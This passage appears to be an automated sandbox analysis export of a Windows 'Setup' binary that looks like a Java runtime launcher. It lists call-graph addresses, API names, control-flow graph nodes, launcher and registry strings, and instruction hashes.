19278->19279 19280 7ff764a2755e 19279->19280 19280->19273 19281 7ff764a316fc 27 API calls 19280->19281 19281->19273 19283 7ff764a275d2 19282->19283 19284 7ff764a2760a 19283->19284 19285 7ff764a275e2 19283->19285 19286 7ff764a31188 16 API calls 19284->19286 19287 7ff764a267ac wprintf 14 API calls 19285->19287 19288 7ff764a275f2 19285->19288 19286->19288 19287->19288 19288->19228 19290 7ff764a27410 FileTimeToSystemTime 19289->19290 19291 7ff764a27403 19289->19291 19292 7ff764a27422 SystemTimeToTzSpecificLocalTime 19290->19292 19293 7ff764a2740b _handle_error 19290->19293 19291->19290 19291->19293 19292->19293 19293->19247 19295 7ff764a3165c 19294->19295 19296 7ff764a315f3 19294->19296 19331 7ff764a35fec 19295->19331 19296->19295 19298 7ff764a315f8 19296->19298 19299 7ff764a31628 19298->19299 19300 7ff764a3160b 19298->19300 19314 7ff764a312f4 GetFullPathNameW 19299->19314 19306 7ff764a31280 GetFullPathNameW 19300->19306 19305 7ff764a31620 __vcrt_freefls 19305->19260 19307 7ff764a312bc 19306->19307 19308 7ff764a312a6 GetLastError 19306->19308 19309 7ff764a312b8 19307->19309 19312 7ff764a2681c _get_daylight 14 API calls 19307->19312 19310 7ff764a267ac wprintf 14 API calls 19308->19310 19309->19305 19311 7ff764a312b3 19310->19311 19313 7ff764a2681c _get_daylight 14 API calls 19311->19313 19312->19309 19313->19309 19315 7ff764a3132b GetLastError 19314->19315 19320 7ff764a31341 __vcrt_freefls 19314->19320 19316 7ff764a267ac wprintf 14 API calls 19315->19316 19318 7ff764a31338 19316->19318 19317 7ff764a3133d 19322 7ff764a314ec 19317->19322 19319 7ff764a2681c _get_daylight 14 API calls 19318->19319 19319->19317 19320->19317 19321 7ff764a31398 GetFullPathNameW 19320->19321 19321->19315 19321->19317 19325 7ff764a31565 memcpy_s 19322->19325 19326 7ff764a31515 __scrt_get_show_window_mode 19322->19326 19323 7ff764a3154e 19324 7ff764a2681c _get_daylight 14 API calls 19323->19324 19330 7ff764a31553 19324->19330 19325->19305 19326->19323 19326->19325 19328 7ff764a31587 19326->19328 19327 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19327->19325 19328->19325 19329 7ff764a2681c _get_daylight 14 API calls 19328->19329 19329->19330 19330->19327 19334 7ff764a35e04 19331->19334 19333 7ff764a3600e 19333->19305 19335 7ff764a35e59 19334->19335 19336 7ff764a35e30 19334->19336 19337 7ff764a35e5d 19335->19337 19338 7ff764a35e7e 19335->19338 19339 7ff764a2681c _get_daylight 14 API calls 19336->19339 19358 7ff764a35f6c 19337->19358 19368 7ff764a31188 19338->19368 19341 7ff764a35e35 19339->19341 19345 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19341->19345 19343 7ff764a35e62 19344 7ff764a35e66 19343->19344 19348 7ff764a35e83 19343->19348 19346 7ff764a267fc wprintf 14 API calls 19344->19346 19357 7ff764a35e40 _handle_error __vcrt_freefls 19345->19357 19347 7ff764a35e6b 19346->19347 19349 7ff764a2681c _get_daylight 14 API calls 19347->19349 19350 7ff764a35f27 19348->19350 19353 7ff764a35eab 19348->19353 19349->19341 19350->19336 19351 7ff764a35f2f 19350->19351 19352 7ff764a31280 16 API calls 19351->19352 19352->19357 19354 7ff764a312f4 17 API calls 19353->19354 19355 7ff764a35ee8 19354->19355 19356 7ff764a314ec 23 API calls 19355->19356 19355->19357 19356->19357 19357->19333 19359 7ff764a35fa5 19358->19359 19360 7ff764a35f86 19358->19360 19362 7ff764a35fb0 GetDriveTypeW 19359->19362 19366 7ff764a35fa1 _handle_error 19359->19366 19361 7ff764a267fc wprintf 14 API calls 19360->19361 19363 7ff764a35f8b 19361->19363 19362->19366 19364 7ff764a2681c _get_daylight 14 API calls 19363->19364 19365 7ff764a35f96 19364->19365 19367 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19365->19367 19366->19343 19367->19366 19369 7ff764a1bb50 __scrt_get_show_window_mode 19368->19369 19370 7ff764a311be GetCurrentDirectoryW 19369->19370 19371 7ff764a311fc 19370->19371 19376 7ff764a311d5 _handle_error 19370->19376 19372 7ff764a2b4e8 _invalid_parameter_noinfo 14 API calls 19371->19372 19373 7ff764a3120b 19372->19373 19374 7ff764a31215 GetCurrentDirectoryW 19373->19374 19375 7ff764a31224 19373->19375 19374->19375 19377 7ff764a31229 19374->19377 19378 7ff764a2681c _get_daylight 14 API calls 19375->19378 19376->19348 19379 7ff764a2b560 __free_lconv_mon 14 API calls 19377->19379 19378->19377 19379->19376 19381 7ff764a31709 19380->19381 19382 7ff764a3172d 19380->19382 19381->19382 19383 7ff764a3170e 19381->19383 19384 7ff764a31767 19382->19384 19387 7ff764a31786 19382->19387 19385 7ff764a2681c _get_daylight 14 API calls 19383->19385 19386 7ff764a2681c _get_daylight 14 API calls 19384->19386 19388 7ff764a31713 19385->19388 19389 7ff764a3176c 19386->19389 19390 7ff764a1d120 sscanf 26 API calls 19387->19390 19391 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19388->19391 19392 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19389->19392 19393 7ff764a31793 19390->19393 19394 7ff764a3171e 19391->19394 19395 7ff764a31777 19392->19395 19393->19395 19396 7ff764a36014 27 API calls 19393->19396 19394->19276 19395->19276 19396->19393 19398 7ff764a144b3 19397->19398 19401 7ff764a145b8 19398->19401 19400 7ff764a144c3 19400->18049 19402 7ff764a145dd sscanf 19401->19402 19405 7ff764a250f4 19402->19405 19404 7ff764a145fa 19404->19400 19406 7ff764a2512a 19405->19406 19407 7ff764a25142 19405->19407 19408 7ff764a2681c _get_daylight 14 API calls 19406->19408 19407->19406 19409 7ff764a25147 sscanf 19407->19409 19410 7ff764a2512f 19408->19410 19412 7ff764a1d120 sscanf 26 API calls 19409->19412 19411 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19410->19411 19415 7ff764a2513a _handle_error 19411->19415 19413 7ff764a25163 19412->19413 19416 7ff764a245a8 19413->19416 19415->19404 19417 7ff764a245c9 19416->19417 19418 7ff764a245c3 19416->19418 19420 7ff764a2681c _get_daylight 14 API calls 19417->19420 19418->19417 19419 7ff764a245e1 19418->19419 19421 7ff764a245e8 19419->19421 19430 7ff764a245fb 19419->19430 19422 7ff764a245ce 19420->19422 19423 7ff764a2681c _get_daylight 14 API calls 19421->19423 19424 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19422->19424 19432 7ff764a245ed 19423->19432 19428 7ff764a245d9 19424->19428 19426 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19426->19428 19428->19415 19429 7ff764a2461a 19429->19428 19431 7ff764a2681c _get_daylight 14 API calls 19429->19431 19430->19429 19433 7ff764a24968 19430->19433 19442 7ff764a21a98 19430->19442 19431->19432 19432->19426 19434 7ff764a2497d 19433->19434 19435 7ff764a249e6 19433->19435 19436 7ff764a249ad 19434->19436 19437 7ff764a24982 19434->19437 19479 7ff764a21a44 19435->19479 19441 7ff764a2498f 19436->19441 19476 7ff764a248e4 19436->19476 19437->19441 19456 7ff764a2469c 19437->19456 19441->19430 19443 7ff764a21ab1 19442->19443 19455 7ff764a21ad5 sscanf 19442->19455 19443->19455 19544 7ff764a27980 19443->19544 19445 7ff764a21af2 19446 7ff764a21afa 19445->19446 19447 7ff764a21b29 19445->19447 19449 7ff764a27980 sscanf 29 API calls 19446->19449 19448 7ff764a21be9 19447->19448 19450 7ff764a21b3f 19447->19450 19451 7ff764a30d30 sscanf 26 API calls 19448->19451 19452 7ff764a21b09 19449->19452 19553 7ff764a24c50 19450->19553 19451->19455 19454 7ff764a27980 sscanf 29 API calls 19452->19454 19452->19455 19454->19452 19455->19430 19457 7ff764a2473c 19456->19457 19458 7ff764a246b5 19456->19458 19459 7ff764a24741 19457->19459 19467 7ff764a246c2 19457->19467 19462 7ff764a246bd 19458->19462 19465 7ff764a246fc sscanf 19458->19465 19458->19467 19460 7ff764a2479b 19459->19460 19461 7ff764a24746 19459->19461 19518 7ff764a247bc 19460->19518 19464 7ff764a2474b 19461->19464 19461->19465 19466 7ff764a246ed 19462->19466 19462->19467 19474 7ff764a246f7 19464->19474 19512 7ff764a2507c 19464->19512 19470 7ff764a2470b 19465->19470 19471 7ff764a24720 19465->19471 19483 7ff764a24a20 19466->19483 19467->19474 19526 7ff764a2482c 19467->19526 19470->19474 19492 7ff764a2185c 19470->19492 19503 7ff764a216a8 19471->19503 19474->19441 19533 7ff764a30d30 19476->19533 19482 7ff764a21a59 19479->19482 19480 7ff764a21a82 19480->19441 19482->19480 19538 7ff764a25204 19482->19538 19484 7ff764a24a39 19483->19484 19486 7ff764a24a46 sscanf 19483->19486 19485 7ff764a21a44 sscanf 29 API calls 19484->19485 19485->19486 19487 7ff764a24a8c 19486->19487 19488 7ff764a24a73 19486->19488 19489 7ff764a216a8 sscanf 23 API calls 19487->19489 19490 7ff764a24a79 19488->19490 19491 7ff764a2185c sscanf 27 API calls 19488->19491 19489->19490 19490->19474 19491->19490 19493 7ff764a218c5 19492->19493 19494 7ff764a21884 19492->19494 19497 7ff764a218e3 19493->19497 19501 7ff764a218ac 19493->19501 19502 7ff764a24fe4 sscanf 27 API calls 19493->19502 19494->19493 19495 7ff764a2189c 19494->19495 19496 7ff764a2681c _get_daylight 14 API calls 19495->19496 19498 7ff764a218a1 19496->19498 19499 7ff764a2681c _get_daylight 14 API calls 19497->19499 19500 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19498->19500 19499->19501 19500->19501 19501->19474 19502->19493 19504 7ff764a216d4 19503->19504 19508 7ff764a2171d 19503->19508 19505 7ff764a216ec 19504->19505 19504->19508 19506 7ff764a2681c _get_daylight 14 API calls 19505->19506 19507 7ff764a216f1 19506->19507 19509 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19507->19509 19510 7ff764a2681c _get_daylight 14 API calls 19508->19510 19511 7ff764a216fc 19508->19511 19509->19511 19510->19511 19511->19474 19513 7ff764a250a1 19512->19513 19517 7ff764a250b1 sscanf 19512->19517 19514 7ff764a2681c _get_daylight 14 API calls 19513->19514 19515 7ff764a250a6 19514->19515 19516 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19515->19516 19516->19517 19517->19474 19519 7ff764a21a44 sscanf 29 API calls 19518->19519 19520 7ff764a247d6 sscanf 19519->19520 19521 7ff764a24817 19520->19521 19522 7ff764a24803 19520->19522 19524 7ff764a2155c sscanf 29 API calls 19521->19524 19523 7ff764a24809 19522->19523 19525 7ff764a21600 sscanf 29 API calls 19522->19525 19523->19474 19524->19523 19525->19523 19527 7ff764a21a44 sscanf 29 API calls 19526->19527 19528 7ff764a24858 19527->19528 19529 7ff764a21150 sscanf 29 API calls 19528->19529 19530 7ff764a248ad 19529->19530 19531 7ff764a248b4 19530->19531 19532 7ff764a2507c sscanf 23 API calls 19530->19532 19531->19474 19532->19531 19534 7ff764a2caec sscanf 26 API calls 19533->19534 19535 7ff764a30d39 19534->19535 19536 7ff764a2cd94 sscanf 26 API calls 19535->19536 19537 7ff764a248f9 19536->19537 19537->19441 19539 7ff764a25250 19538->19539 19542 7ff764a25227 19538->19542 19540 7ff764a30d30 sscanf 26 API calls 19539->19540 19541 7ff764a25232 19540->19541 19541->19482 19542->19541 19543 7ff764a30dcc sscanf 29 API calls 19542->19543 19543->19541 19545 7ff764a279ba 19544->19545 19546 7ff764a27999 19544->19546 19547 7ff764a2caec sscanf 26 API calls 19545->19547 19546->19445 19548 7ff764a279bf 19547->19548 19549 7ff764a2cd94 sscanf 26 API calls 19548->19549 19550 7ff764a279d8 19549->19550 19550->19546 19551 7ff764a30dcc sscanf 29 API calls 19550->19551 19552 7ff764a27a0e 19551->19552 19552->19445 19554 7ff764a24c65 19553->19554 19556 7ff764a24c95 19554->19556 19557 7ff764a2c0d0 19554->19557 19556->19455 19558 7ff764a2c0e3 19557->19558 19559 7ff764a2af50 sscanf 29 API calls 19558->19559 19560 7ff764a2c0f5 19559->19560 19560->19556 19562 7ff764a122cb wprintf 19561->19562 19563 7ff764a1ed08 wprintf 60 API calls 19562->19563 19564 7ff764a122e9 wprintf 19563->19564 19565 7ff764a14454 fwprintf 60 API calls 19564->19565 19566 7ff764a12302 19565->19566 19566->18125 19568 7ff764a1792c 19567->19568 19569 7ff764a111b8 52 API calls 19568->19569 19570 7ff764a17953 19569->19570 19571 7ff764a111b8 52 API calls 19570->19571 19573 7ff764a17965 memcpy_s 19571->19573 19572 7ff764a111b8 52 API calls 19572->19573 19573->19572 19574 7ff764a179f1 19573->19574 19575 7ff764a111ec 52 API calls 19573->19575 19576 7ff764a17680 19574->19576 19575->19573 19577 7ff764a177c7 19576->19577 19581 7ff764a176a2 19576->19581 19582 7ff764a17838 19577->19582 19578 7ff764a26a90 31 API calls 19578->19581 19580 7ff764a111ec 52 API calls 19580->19581 19581->19577 19581->19578 19581->19580 19586 7ff764a17a9c 19581->19586 19583 7ff764a17865 19582->19583 19584 7ff764a111b8 52 API calls 19583->19584 19585 7ff764a1788a memcpy_s 19584->19585 19585->18142 19587 7ff764a111b8 52 API calls 19586->19587 19588 7ff764a17ac7 19587->19588 19589 7ff764a111b8 52 API calls 19588->19589 19590 7ff764a17ad5 19589->19590 19591 7ff764a111b8 52 API calls 19590->19591 19592 7ff764a17ae3 FindFirstFileA 19591->19592 19594 7ff764a17afc 19592->19594 19597 7ff764a17b13 memcpy_s 19592->19597 19593 7ff764a17b31 FindNextFileA 19595 7ff764a17c2e FindClose 19593->19595 19593->19597 19594->19581 19595->19594 19596 7ff764a111b8 52 API calls 19596->19597 19597->19593 19597->19596 19598 7ff764a111ec 52 API calls 19597->19598 19598->19597 19600 7ff764a14180 19599->19600 19630 7ff764a14281 19600->19630 19631 7ff764a17c68 19600->19631 19603 7ff764a141bb 19606 7ff764a141d0 19603->19606 19635 7ff764a14620 19603->19635 19604 7ff764a14223 19605 7ff764a17cc0 90 API calls 19604->19605 19608 7ff764a14228 19605->19608 19609 7ff764a14620 81 API calls 19606->19609 19612 7ff764a141f0 19606->19612 19610 7ff764a1424a 19608->19610 19611 7ff764a1422d 19608->19611 19609->19612 19614 7ff764a17cf0 90 API calls 19610->19614 19613 7ff764a17dc0 90 API calls 19611->19613 19620 7ff764a14214 19612->19620 19644 7ff764a17cc0 19612->19644 19615 7ff764a14238 19613->19615 19614->19620 19656 7ff764a17cf0 19615->19656 19660 7ff764a17d78 19620->19660 19626 7ff764a14269 19627 7ff764a16f98 52 API calls 19626->19627 19628 7ff764a14275 19627->19628 19629 7ff764a16f98 52 API calls 19628->19629 19629->19630 19630->18146 19632 7ff764a17c8c 19631->19632 19633 7ff764a141b3 19631->19633 19668 7ff764a16ed8 19632->19668 19633->19603 19633->19604 19636 7ff764a29364 81 API calls 19635->19636 19637 7ff764a14646 19636->19637 19638 7ff764a14cec 37 API calls 19637->19638 19642 7ff764a1464d 19637->19642 19639 7ff764a14660 19638->19639 19640 7ff764a150bc 37 API calls 19639->19640 19643 7ff764a14673 19639->19643 19640->19643 19641 7ff764a28b28 28 API calls 19641->19642 19642->19606 19643->19641 19645 7ff764a141fd 19644->19645 19646 7ff764a17cd0 19644->19646 19648 7ff764a17dc0 19645->19648 19647 7ff764a16ed8 90 API calls 19646->19647 19647->19645 19649 7ff764a17dd8 19648->19649 19650 7ff764a14208 19648->19650 19651 7ff764a16ed8 90 API calls 19649->19651 19652 7ff764a17d30 19650->19652 19651->19650 19653 7ff764a17d4b 19652->19653 19654 7ff764a17d57 19652->19654 19655 7ff764a16ed8 90 API calls 19653->19655 19654->19620 19655->19654 19657 7ff764a17d11 19656->19657 19658 7ff764a17d05 19656->19658 19657->19620 19659 7ff764a16ed8 90 API calls 19658->19659 19659->19657 19661 7ff764a1425d 19660->19661 19662 7ff764a17d94 19660->19662 19664 7ff764a16f98 19661->19664 19663 7ff764a16ed8 90 API calls 19662->19663 19663->19661 19665 7ff764a16faa 19664->19665 19666 7ff764a111b8 52 API calls 19665->19666 19667 7ff764a16fb3 19666->19667 19667->19626 19669 7ff764a16220 88 API calls 19668->19669 19670 7ff764a16f09 19669->19670 19671 7ff764a16f74 _handle_error 19670->19671 19672 7ff764a16f4f LoadLibraryA 19670->19672 19673 7ff764a16f66 GetProcAddress 19670->19673 19671->19633 19672->19671 19672->19673 19673->19671 19675 7ff764a2caec sscanf 26 API calls 19674->19675 19676 7ff764a28919 19675->19676 19677 7ff764a2a544 sscanf 26 API calls 19676->19677 19678 7ff764a2892f 19677->19678 20484 7ff764a38ee5 20485 7ff764a38efe 20484->20485 20486 7ff764a38ef4 20484->20486 20488 7ff764a2f57c LeaveCriticalSection 20486->20488

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 00007FF764A11DA4 Relevance: 59.8, APIs: 13, Strings: 21, Instructions: 294COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 0 7ff764a11da4-7ff764a11e65 call 7ff764a165ec call 7ff764a111b0 5 7ff764a11f59-7ff764a11f60 call 7ff764a111b0 0->5 6 7ff764a11e6b-7ff764a11f34 call 7ff764a1115c call 7ff764a111b0 call 7ff764a1115c * 4 call 7ff764a16628 call 7ff764a1115c * 4 0->6 11 7ff764a11faa-7ff764a11ff3 call 7ff764a138c8 call 7ff764a1593c 5->11 12 7ff764a11f62-7ff764a11f74 call 7ff764a1115c 5->12 73 7ff764a11f4d 6->73 74 7ff764a11f36-7ff764a11f39 6->74 26 7ff764a11ff8-7ff764a11fff 11->26 22 7ff764a11f9c-7ff764a11fa5 call 7ff764a117b4 12->22 23 7ff764a11f76 12->23 22->11 27 7ff764a11f79-7ff764a11f9a call 7ff764a1115c 23->27 30 7ff764a1200f-7ff764a12020 call 7ff764a111b0 26->30 31 7ff764a12001-7ff764a1200a call 7ff764a13e6c 26->31 27->22 39 7ff764a1202c 30->39 40 7ff764a12022-7ff764a1202a call 7ff764a15660 30->40 31->30 41 7ff764a12031-7ff764a12041 call 7ff764a16a04 39->41 40->41 49 7ff764a1204d-7ff764a12054 call 7ff764a111b0 41->49 50 7ff764a12043-7ff764a12048 41->50 59 7ff764a1205d 49->59 60 7ff764a12056-7ff764a1205b call 7ff764a15660 49->60 52 7ff764a1227a-7ff764a1229c call 7ff764a1ac60 50->52 63 7ff764a12062-7ff764a1208d call 7ff764a15638 call 7ff764a112a8 59->63 60->63 75 7ff764a1208f-7ff764a120b4 call 7ff764a142a8 call 7ff764a115fc 63->75 76 7ff764a120c0-7ff764a120da call 7ff764a1f60c call 7ff764a13de4 63->76 79 7ff764a11f54 call 7ff764a1115c 73->79 77 7ff764a11f3b-7ff764a11f42 74->77 78 7ff764a11f44-7ff764a11f4b 74->78 88 7ff764a120df-7ff764a12110 call 7ff764a12be4 75->88 89 7ff764a120b6-7ff764a120bb 75->89 76->88 77->79 78->79 79->5 92 7ff764a1211b-7ff764a12129 88->92 93 7ff764a12112-7ff764a12116 88->93 89->52 94 7ff764a1212b-7ff764a1212e 92->94 95 7ff764a12191-7ff764a1219e 92->95 93->52 94->95 96 7ff764a12130-7ff764a12152 call 7ff764a17a14 call 7ff764a1f730 * 2 94->96 97 7ff764a1223a-7ff764a12275 call 7ff764a117b4 call 7ff764a16ebc call 7ff764a169b8 95->97 98 7ff764a121a4-7ff764a121b4 call 7ff764a1f730 95->98 96->95 121 7ff764a12154-7ff764a12187 call 7ff764a1f730 call 7ff764a111b8 call 7ff764a14560 call 7ff764a117b4 96->121 97->52 106 7ff764a121d0-7ff764a1220b call 7ff764a1f730 call 7ff764a111b8 call 7ff764a25670 * 2 98->106 107 7ff764a121b6 98->107 130 7ff764a1220d-7ff764a1222e call 7ff764a25670 * 2 106->130 131 7ff764a12230-7ff764a12235 call 7ff764a117b4 106->131 111 7ff764a121b9-7ff764a121ce call 7ff764a1f730 107->111 111->106 121->95 140 7ff764a12189-7ff764a1218c call 7ff764a111e4 121->140 130->131 131->97 140->95
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wprintf$CommonControlsInitsprintf
                                                                                                                                                                                                            • String ID: debug:%s$dotversion:%s$ergo_policy:$fullversion:%s$javargs:%s$javaw:%s$launcher name:%s$program name:%s$%ld micro seconds to LoadJavaVM$-Djava.class.path=%s$-Dsun.java.command=$-Dsun.java.launcher.diag=true$-Dsun.java.launcher=SUN_STANDARD$ALWAYS_ACT_AS_A_SERVER_CLASS_MACHINE$CLASSPATH$Command line args:$DEFAULT_ERGONOMICS_POLICY$Launcher state:$NEVER_ACT_AS_A_SERVER_CLASS_MACHINE$argv[%d] = %s$off
                                                                                                                                                                                                            • API String ID: 3782895439-2613195925
                                                                                                                                                                                                            • Opcode ID: 35aa27bf56d7e74ef57a47c8dcd04c09e893ff32923b0b57d3ae2ec0596db681
                                                                                                                                                                                                            • Instruction ID: 4fd300cfa603697596d8b533687f437e055b872783f6d9b2e2e717acd1140242
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35aa27bf56d7e74ef57a47c8dcd04c09e893ff32923b0b57d3ae2ec0596db681
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BAD19E32A08642E5EA52FF13E8C09F9E771AF9A784FE00036E94D47796DE2CE545C720
                                                                                                                                                                                                            Function 00007FF764A1637C Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 114registryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Close$OpenQueryValuewprintf$Message
                                                                                                                                                                                                            • String ID: CurrentVersion$Error: Failed reading value of registry key:%s\CurrentVersion$Error: Registry key '%s'\CurrentVersion'has value '%s', but '%s' is required.$Error: opening registry key '%s'$Failed reading value of registry key:%s\%s\JavaHome$JavaHome$MicroVersion$Software\JavaSoft\Java Runtime Environment$Version major.minor.micro = %s.%s$Warning: Can't read MicroVersion
                                                                                                                                                                                                            • API String ID: 1004157669-1407590046
                                                                                                                                                                                                            • Opcode ID: c08fc69ab7d0758b2109dd942bfb8d28955c23fcd95e4411def2c2e65afa633d
                                                                                                                                                                                                            • Instruction ID: c2b1ab748d930969b45d695e5e839c9215d2adcf4d66c72675098b91443d46f3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c08fc69ab7d0758b2109dd942bfb8d28955c23fcd95e4411def2c2e65afa633d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52514D31A18682E2EA12BF52E8D09FAA371FF95794FE01032E94E97755DE3CD509C720
                                                                                                                                                                                                            Function 00007FF764A11000 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wprintf$CommandLine
                                                                                                                                                                                                            • String ID: 1.8$1.8.0_381-b09$Windows original main args:$_JAVA_LAUNCHER_DEBUG$wwwd_args[%d] = %s
                                                                                                                                                                                                            • API String ID: 921100755-1407750259
                                                                                                                                                                                                            • Opcode ID: d8f7644c556615631eb1845b4a037e8a21cf320a5f394ecba67ce57f01b19ca9
                                                                                                                                                                                                            • Instruction ID: 7c3c1b75e1a6d8d45a8c56f444d6031b52665afed82019a7b4dde1c5e8abfb24
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8f7644c556615631eb1845b4a037e8a21cf320a5f394ecba67ce57f01b19ca9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25318231A08A82E5FB52AF56E5C0AB9F771AF98B84FA04135DA4D43756DF3CE044C320
                                                                                                                                                                                                            Function 00007FF764A1A7A4 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1452418845-0
                                                                                                                                                                                                            • Opcode ID: 29b13c7cf00c402d89aedddd03e07bd6005fa31edf51c8e0e98308c6cd2c8403
                                                                                                                                                                                                            • Instruction ID: 16268b2b0c9d815b562d429b4f8567a5768f815f6a38030292672f18e762f548
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29b13c7cf00c402d89aedddd03e07bd6005fa31edf51c8e0e98308c6cd2c8403
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E316B21E0D143E5FA16BF6795D1FF9A2A2AF40384FE44039E54E472D7DE2CA409C230
                                                                                                                                                                                                            Function 00007FF764A16630 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
